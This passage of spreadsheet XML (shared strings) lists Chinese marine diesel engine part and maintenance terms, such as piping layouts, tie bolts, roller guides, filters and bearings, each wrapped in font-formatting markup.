      <t>管系布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管系</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管系</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部支架后面</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管系符号说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管系基本符号</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管系</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气分配器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管系</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管系</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>置零</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管系装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管悬挂器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管用绝缘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管用照明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油泵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管状</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>O</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管状套筒扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管子清洁和处理</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管子清洁和处理生产建议</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管子弯头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓衬垫</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓的保护帽</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓的液压螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓的主尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓定位元件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓管总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓焊接说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓加工说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓剖面</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓上部总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓液压拉伸器</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓液压千斤顶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>光滑钢管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>光警报</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>光耦合器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>规格书清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>硅胶包装胶</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封胶</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>硅密封膏</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>硅油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柜</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柜安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柜说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚动销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚动轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摇杆用滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套安装说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套的衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套的滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套的起吊键</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套的轴承衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套吊装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套阀检修</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套滑油泄放管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套壳体维修</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套壳体修理</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套壳体找正</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套提升工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套支架检修</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮链</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮止动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚针轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚针轴承，轴向的</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>国定环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>国际船级社</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>UR M44</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤控制系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤器安装板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤器板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤器插芯的装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤器导板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤器盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤器盖总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤器监测</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤器箱导套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过盈接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过盈接头，内</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过盈型阀座环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过盈型主轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>海绵橡胶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>海水</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
